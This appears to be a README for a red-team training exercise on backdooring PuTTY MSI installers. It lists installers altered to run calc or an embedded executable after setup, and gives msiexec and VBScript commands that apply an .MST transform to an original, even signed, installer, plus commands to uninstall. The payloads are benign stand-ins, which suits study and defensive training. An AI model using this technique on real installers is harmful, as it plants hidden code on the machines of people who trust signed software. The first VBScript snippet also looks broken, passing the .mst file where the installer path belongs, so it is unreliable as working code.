## MSI Backdooring

- `putty-0.67-installer.msi` - vanilla plain Putty installer
- `putty-0.67-backdoored.msi` - runs `calc` after installing Putty
- `putty-0.67-backdoored2.msi` - runs `Autoruns64.exe` in run-exe fashion (EXE embedded into `Binary` table) after installing Putty 

## .MST Transforms

1. .MST files represent changes/transforms to be applied to original MSI so that it behaves differently

By themselves, they cannot be used directly. Rather MSIEXEC has to merge them while running original installer.

Also, original input .MSI that was used to produce that .MST needs to be present side-by-side of that .MST (in same directory!)

(1) "Backdoor" original (even digitally signed!) .MSI installer with following command:


```
cmd> msiexec /i "C:\Training\Exercises\day1\MSI Shenanigans\backdoor\putty-0.67-installer.msi" TRANSFORMS=putty-run-calc.mst
```

(2) Install through COM (here's VBScript):


```
With CreateObject("WindowsInstaller.Installer")
	.UILevel = 2
    .InstallProduct("C:\Training\Exercises\day1\MSI Shenanigans\backdoor\putty-run-calc.mst"), "TRANSFORMS=putty-run-calc.mst"
End With
```


2. To UNINSTALL your MSI (and therefore undo changes introduced by .MST), follow:

(1) Uninstall quietly from command line:

```
cmd> msiexec /q /x C:\Training\Exercises\day1\MSI Shenanigans\backdoor\putty-0.67-installer.msi
```

(2) Uninstall through COM (here's VBScript):

```
With CreateObject("WindowsInstaller.Installer")
	.UILevel = 2
	.InstallProduct "C:\Training\Exercises\day1\MSI Shenanigans\backdoor\putty-0.67-installer.msi", "REMOVE=ALL"
End With
```